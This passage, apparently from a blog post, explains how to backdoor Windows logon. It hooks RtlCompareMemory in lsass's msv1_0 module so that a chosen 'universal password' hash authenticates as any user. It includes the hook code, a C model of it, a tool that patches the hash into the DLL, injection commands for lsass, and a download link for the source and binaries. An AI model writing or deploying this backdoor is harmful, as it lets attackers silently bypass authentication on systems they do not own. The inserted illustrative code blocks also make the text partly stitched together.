/* tail of MyRtlCompareMemory; the signature is reconstructed from the text below */
SIZE_T WINAPI MyRtlCompareMemory(const VOID *a, const VOID *b, SIZE_T len)
{
    /* a 16-byte compare whose second block is our hash always "matches" */
    if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
        return 16;
    return pRtlCompareMemory(a, b, len);
}
Here pRtlCompareMemory is a global variable holding the address of the real RtlCompareMemory, and PASSWD_HASH is the hash of the universal password (16 bytes, the size of an NT hash).
Hooking RtlCompareMemory with MyRtlCompareMemory gives exactly the behaviour we want:
whenever the length to compare is 16 and the second block of memory equals our hash, the compare is reported as a full match, no matter what the first block contains. (RtlCompareMemory returns the number of leading bytes that match, so a return value of 16 means "the two hashes are equal".)
Some readers will ask: you have hooked every call to RtlCompareMemory in the msv1_0 module, won't that break something?
Don't worry: how likely is it that some other call both compares exactly 16 bytes and has a second block that is byte-for-byte identical to our hash?
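To make the hook's behaviour concrete, here is an added example (not code from passdoor.dll or from this article) that models it on any C compiler: real_RtlCompareMemory stands in for ntdll's RtlCompareMemory with the same return convention, logon_ok is an assumed model of the msv1_0 check with the stored hash as the first operand and the hash of the typed password as the second, and all hash values are constructed. It also shows the one collateral effect discussed above: an unrelated 16-byte compare whose second block happens to equal PASSWD_HASH reports a full match.

```c
#include <stddef.h>
#include <stdio.h>

/* Stand-in for ntdll!RtlCompareMemory: returns how many leading bytes of
 * the two blocks are equal, so a complete 16-byte match returns 16. */
static size_t real_RtlCompareMemory(const void *a, const void *b, size_t len)
{
    const unsigned char *p = a, *q = b;
    size_t i = 0;
    while (i < len && p[i] == q[i])
        i++;
    return i;
}

/* The two globals named in the text: the saved address of the real function
 * and the universal hash. The hash value here is a constructed placeholder. */
static size_t (*pRtlCompareMemory)(const void *, const void *, size_t) =
    real_RtlCompareMemory;
static unsigned char PASSWD_HASH[16] = {
    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
    0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f };

/* The hook: a 16-byte compare whose second operand is PASSWD_HASH reports a
 * full match no matter what the first operand holds; everything else is
 * passed through to the real function untouched. */
static size_t MyRtlCompareMemory(const void *a, const void *b, size_t len)
{
    if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
        return 16;
    return pRtlCompareMemory(a, b, len);
}

/* Assumed model of the msv1_0 check: the stored hash is the first operand,
 * the hash derived from the typed password is the second, and the logon
 * succeeds only when all 16 bytes match. */
static int logon_ok(const unsigned char stored[16], const unsigned char supplied[16])
{
    return MyRtlCompareMemory(stored, supplied, 16) == 16;
}

/* Constructed sample data: a user's real hash and a wrong guess that shares
 * its first three bytes. */
static const unsigned char STORED_HASH[16] = {
    0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,
    0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f };
static const unsigned char WRONG_HASH[16] = {
    0x20, 0x21, 0x22, 0x99, 0x24, 0x25, 0x26, 0x27,
    0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f };

int main(void)
{
    printf("real password : %d\n", logon_ok(STORED_HASH, STORED_HASH)); /* 1 */
    printf("universal hash: %d\n", logon_ok(STORED_HASH, PASSWD_HASH)); /* 1 */
    printf("wrong password: %d\n", logon_ok(STORED_HASH, WRONG_HASH));  /* 0 */
    /* The only collateral effect: any other 16-byte compare whose second
     * block equals PASSWD_HASH also reports a full match (prints 16). */
    printf("unrelated compare: %zu\n",
           MyRtlCompareMemory(WRONG_HASH, PASSWD_HASH, 16));
    return 0;
}
```

Note that the hook only fires when the universal hash is the second operand; a compare with the universal hash as the first operand, or with any length other than 16, goes straight to the real function.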
There are many ways to hook this function;
I chose the laziest: an IAT hook plus DLL injection.
So I wrote a small tool to inject the DLL: InjectDll
Code:
C:\Documents and Settings\cly\Desktop\bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
Usage:
InjectDll.exe (-i | -u | -U) pid filename
-i: Inject
-u: UnInject once
-U: UnInject at all
passdoor.dll is the DLL that gets injected into the lsass process. It installs the IAT hook in its DllMain; that is a well-worn technique, so I have not pasted much of that code, a quick web search turns up plenty of examples.
I then wrote another small tool: pdconfig.
It simply rewrites the hash stored inside passdoor.dll, so that changing the universal password does not require recompiling passdoor.dll.
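As an added illustration of what such a config tool does (this is not pdconfig's own source, which the page does not show), the following C assumes that the DLL stores the hash immediately after a fixed marker string, PASSDOOR_HASH:, an assumption introduced for this example; the file image and hash values are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define HASH_LEN 16
/* Hypothetical tag assumed to sit directly before the 16-byte hash inside
 * the DLL, so a patcher can find the hash in the file without symbols. */
static const char HASH_MARKER[] = "PASSDOOR_HASH:";

/* Parse a 32-character hex hash into 16 raw bytes; returns 1 on success,
 * 0 if the string has the wrong length or a non-hex character. */
static int parse_hash_hex(const char *hex, unsigned char out[HASH_LEN])
{
    if (strlen(hex) != 2 * HASH_LEN)
        return 0;
    for (size_t i = 0; i < HASH_LEN; i++) {
        int v = 0;
        for (int k = 0; k < 2; k++) {
            int c = tolower((unsigned char)hex[2 * i + k]);
            int d = (c >= '0' && c <= '9') ? c - '0'
                  : (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
            if (d < 0)
                return 0;
            v = v * 16 + d;
        }
        out[i] = (unsigned char)v;
    }
    return 1;
}

/* Locate the marker in an in-memory copy of the file and overwrite the hash
 * that follows it. Returns the file offset of the hash, or -1 if no marker. */
static long patch_hash(unsigned char *image, size_t image_len,
                       const unsigned char new_hash[HASH_LEN])
{
    const size_t mlen = sizeof HASH_MARKER - 1;
    for (size_t off = 0; off + mlen + HASH_LEN <= image_len; off++) {
        if (memcmp(image + off, HASH_MARKER, mlen) == 0) {
            memcpy(image + off + mlen, new_hash, HASH_LEN);
            return (long)(off + mlen);
        }
    }
    return -1;
}

/* What the tool does once the DLL has been read into memory:
 * -2 = bad hex string, -1 = marker not found, otherwise the offset patched. */
static long apply_hash_hex(unsigned char *image, size_t image_len, const char *hex)
{
    unsigned char h[HASH_LEN];
    if (!parse_hash_hex(hex, h))
        return -2;
    return patch_hash(image, image_len, h);
}

/* Constructed stand-in for passdoor.dll on disk: a few header bytes, the
 * marker, a placeholder hash of 0xaa bytes, then one more byte. */
static unsigned char SAMPLE_IMAGE[] =
    "MZ\x90\x00\x03PASSDOOR_HASH:"
    "\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
    "\xc3";

int main(void)
{
    long off = apply_hash_hex(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE,
                              "0123456789abcdefFEDCBA9876543210");
    printf("hash patched at offset %ld\n", off); /* 19 */
    return off < 0;
}
```

A real tool would fread the DLL into a buffer, call apply_hash_hex with the 32-character hex form of the new 16-byte hash, and fwrite the buffer back; the error codes distinguish a mistyped hash from a DLL that was built without the marker.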
To install:
Code:
InjectDll.exe -i pid_of_lsass full_path_of_passdoor.dll
To unload:
Code:
InjectDll.exe -U pid_of_lsass full_path_of_passdoor.dll
http://clyfish.googlepages.com/passdoor.rar
This archive contains the source code of the tools described in this article as well as the compiled binaries:
InjectDll.exe, passdoor.dll and pdconfig.exe. All code was built with MinGW gcc 4.2.1.